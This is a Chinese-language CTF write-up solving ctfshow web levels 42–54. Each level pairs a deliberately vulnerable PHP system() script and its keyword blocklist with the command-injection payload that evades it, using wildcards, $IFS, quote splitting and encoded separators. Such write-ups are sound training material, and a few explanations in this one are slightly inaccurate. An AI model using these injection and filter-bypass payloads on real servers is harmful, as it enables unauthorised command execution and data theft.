【CTFWP】ctfshow-web42-52

avatar
作者
猴君
阅读量:0

文章目录


web42

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     system($c." >/dev/null 2>&1"); }else{     highlight_file(__FILE__); } 

题目分析:

这段 PHP 脚本是一个简单的 web shell,它允许通过 URL 参数 c 执行系统命令。如果 c 参数被设置,脚本将使用 system() 函数执行传入的命令,并将输出重定向到 /dev/null,这意味着命令的输出将被丢弃,不会显示给用户。如果 c 参数没有被设置,脚本将使用 highlight_file() 函数高亮显示当前脚本文件的内容。

这里是脚本的逐行解释:

  1. <?php:这是 PHP 代码的开始标记。
  2. if(isset($_GET['c'])){:检查 URL 中是否有 c 参数。
  3. $c=$_GET['c'];:如果存在 c 参数,将其值赋给变量 $c
  4. system($c." >/dev/null 2>&1");:执行变量 $c 中的命令,并重定向标准输出和标准错误输出到 /dev/null
  5. }else{:如果 c 参数不存在,执行下面的代码块。
  6. highlight_file(__FILE__);:显示当前脚本文件的内容,并高亮显示 PHP 代码。
  7. }:结束 else 代码块。
  8. ?>:这是 PHP 代码的结束标记。

system($c." >/dev/null 2>&1");具体解释

在 PHP 中,system() 函数用于执行一个命令并输出结果。这个函数的典型用法是:

system($command, &$output); 

其中 $command 是要执行的命令字符串,$output 是一个变量,用于存储命令的输出。

在代码片段中:

system($c." >/dev/null 2>&1"); 

这行代码执行了以下操作:

  1. $c 是从 URL 参数 c 获取的值。这意味着如果有人访问这个脚本并提供了一个 c 参数,比如 c=ls,那么 $c 的值将是 ls

  2. $c." >/dev/null 2>&1"$c 与重定向操作符连接起来。这里的重定向操作符有两个部分:

    • >/dev/null:这将命令的标准输出(stdout)重定向到 /dev/null,这是一个特殊的文件,用于丢弃所有写入到它的数据。这相当于在命令行中使用 >/dev/null
    • 2>&1:这将命令的标准错误(stderr)重定向到标准输出(stdout)。由于标准输出已经被重定向到 /dev/null,因此标准错误也会被丢弃。
  3. system() 函数执行由 $c 和重定向操作符组成的命令串。由于使用了重定向,命令的输出和错误都不会显示在浏览器中,也不会保存在任何地方。

举例说明

假设有如下的 URL 访问:

http://example.com/script.php?c=ls 

在这个例子中,$c 的值将是 ls,所以 system() 函数将执行以下命令:

ls >/dev/null 2>&1 

这将在服务器上列出当前目录的内容,但由于使用了重定向,这些内容不会被显示给用户,也不会保存在任何地方。

黑洞(/dev/null)解释:

在 Unix 和类 Unix 系统中,/dev/null 是一个特殊的文件,它被称为“黑洞”,因为它会丢弃所有写入它的数据。这相当于一个数据的“下水道”,任何发送到 /dev/null 的数据都会被永久删除,不会有任何输出。

以下是一些关于 /dev/null 的说明:

  1. 丢弃数据:当你执行一个命令,并将输出重定向到 /dev/null,比如 command > /dev/null,这意味着命令的输出将不会被显示或保存。

  2. 安静运行:如果一个命令会产生大量输出,但你不需要这些输出,你可以使用 /dev/null 来让命令“安静”地运行。

  3. 错误处理:除了重定向标准输出到 /dev/null,你还可以将标准错误重定向到同一个地方,使用 2>&1 > /dev/null。这样,命令的错误信息也会被丢弃。

  4. 日志记录:在某些情况下,你可能想要运行一个脚本或程序,但又不希望它生成日志文件。通过将输出重定向到 /dev/null,你可以避免生成日志。

  5. 测试:在开发和测试过程中,如果输出不是必需的,使用 /dev/null 可以简化测试过程,专注于其他方面。

  6. 安全性:虽然 /dev/null 本身不涉及安全性问题,但使用它来丢弃可能包含敏感信息的输出可以避免潜在的安全风险。

  7. 环境变量:在 shell 脚本中,/dev/null 有时被用作环境变量,以确保命令不会影响输出。

  8. 系统调用:在编程中,/dev/null 可以作为系统调用的目标,比如在 C 语言中使用 open("/dev/null", "w") 打开一个文件描述符,用于写入数据。

总之,/dev/null 是一个用于丢弃数据的特殊文件,它在 Unix 和类 Unix 系统中广泛使用,以简化命令行操作和提高脚本的灵活性。

payload:

?c=tac flag.php;ls 

payload解释:

采用双写绕过?c=tac flag.php;ls 这里呢,是把分号后面的ls写到黑洞里面去了,第一个tac就逃出来了

flag:

ctfshow{505e7f24-823d-4dd4-96f1-2edcdcc4877a}

web43

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 这个相比上题,过滤了分号

  • 除了分号,还可以用&&

  • 要url编码后使用 %26%26

payload:

?c=tac flag.php%26%26ls 

flag:

ctfshow{3ff43859-a599-4f16-bcb4-957d4c22a578}

web44

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/;|cat|flag/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 这题多过滤了flag
  • 可以使用通配符绕过
  • 通配符有*?

payload:

?c=tac fl?g.php%26%26ls ?c=tac fl*g.php%26%26ls 

flag:

ctfshow{ad1f49da-357e-4b25-98ff-3fc1a0f48820}

web45

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| /i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 多过滤了空格,url编码的空格也被过滤了

  • 如果过滤了空格,可以使用:

    <> %20(space) %09(tab) 

payload:

?c=tac%09fla?.php%26%26ls 

flag:

ctfshow{750bf5e9-71c6-4bf8-beb4-b026c0570fbc}

web46

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 对比上一题,把数字也过滤了,还有$*这两个符号

payload:

?c=tac%09fla?.php%26%26ls 

flag:

ctfshow{9b5a8f1e-f342-40f4-b6a8-81d777d0c9ba}

web47

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 多过滤了几个查看文件的命令

  • Linux查看文件命令:

    cat tac more less head tail nl tailf 

payload:

?c=tac%09fla?.php%26%26ls 

flag:ctfshow{37269e44-8e76-485c-a966-54a52da88cfd}

web48

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 又多过滤了几个读取文件的命令

payload:

?c=tac%09fla?.php%26%26ls 

flag:

ctfshow{570f034a-31d9-4a80-91f6-bc761734dabe}

web49

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 多过滤了%
  • %09%会被解析成制表符,不算做%

payload:

?c=tac%09fla?.php%26%26ls 

flag:

ctfshow{233ec2aa-440f-48dc-8548-9689626fc10d}

web50

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 这个把09和26过滤了,之前的方法就不可以了。得想新不用空格的方法了

  • 使用nl带行号?c=nl<flag.php||ls

    • nl 命令nl 是一个用于添加行号到文本文件的命令。它通常用于给文本文件的每一行添加行号,以便于引用和阅读。
    • 重定向< 是一个输入重定向操作符,它允许将文件的内容作为命令的输入。
  • 把||进行url编码%7C%7C

  • flag绕过是采用中间加两个单引号,两个单引号分割字符串执行的时候会被忽略

payload:

?c=nl<fla''g.php%7C%7Cls 

flag:

按F12查看

ctfshow{f6ef33bf-57ea-4e5d-aa1f-726595652bf6}

web51

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 多过滤了一个tac

payload:

?c=nl<fla''g.php%7C%7Cls 

flag:

ctfshow{0581c93f-a53f-44d4-8d74-83397bfc7b96}

web52

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){         system($c." >/dev/null 2>&1");     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 这个把<>也过滤了,上面的方法是不行了,但是把$符号放出来了
  • 空格就可以使用$IFS$9$IFS${IFS} 来绕过了

payload:

?c=nl${IFS}fla''g.php%7C%7Cls 

回显:$flag="flag_here";

查看根目录文件

?c=ls${IFS}/%7C%7Cls 

回显:bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

ls -l查看flag详细信息

?c=ls${IFS}-l${IFS}/%7C%7Cls 

回显:flag drwxr-xr-x

查看flag文件

?c=nl${IFS}/fla''g%7C%7Cls 

flag:

ctfshow{3123e5da-6eb9-44e6-a309-117bb87aba88}

web53

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){         echo($c);         $d = system($c);         echo "<br>".$d;     }else{         echo 'no';     } }else{     highlight_file(__FILE__); } 

题目解析:

  • echo($c);是输出GET传入的参数
  • $d = system($c);是执行c的语句后得到的东西赋值给d
  • echo "<br>".$d;是换行后在输出d的内容
  • echo 'no';是if判断错误的话会输出no

payload:

先查看一下目录

?c=ls${IFS} 

回显:

ls${IFS}flag.php index.php readflag readflag 

直接查看flag.php

?c=nl${IFS}fla''g.php 

回显:flag

flag:

ctfshow{d2bc773c-85e5-44cb-b04b-eabc11b12d58}

web54

<?php if(isset($_GET['c'])){     $c=$_GET['c'];     if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){         system($c);     } }else{     highlight_file(__FILE__); } 

题目解析:

  • 完全禁用了这些命令
  • 对flag.php的构造可以这样:fl??.??? 甚至可以简化为:???????? 同样,命令也可以进行构造 cat可以构造为?atc??

payload:

这里的/bin/是指bin目录下检索c??,不然在当前目录是没有这个命令的

?c=/bin/c??${IFS}???????? 

另外grep命令可以才文件中查找含有的字符串 形式:grep [字符串] [filename]

?c=grep${IFS}ctfshow${IFS}???????? 

重命名文件也可以

?c=mv${IFS}fl??.???${IFS}a.txt 

访问a.txt即可

flag:

ctfshow{f5404f94-7a53-46ee-9153-f9132349bb47}


广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!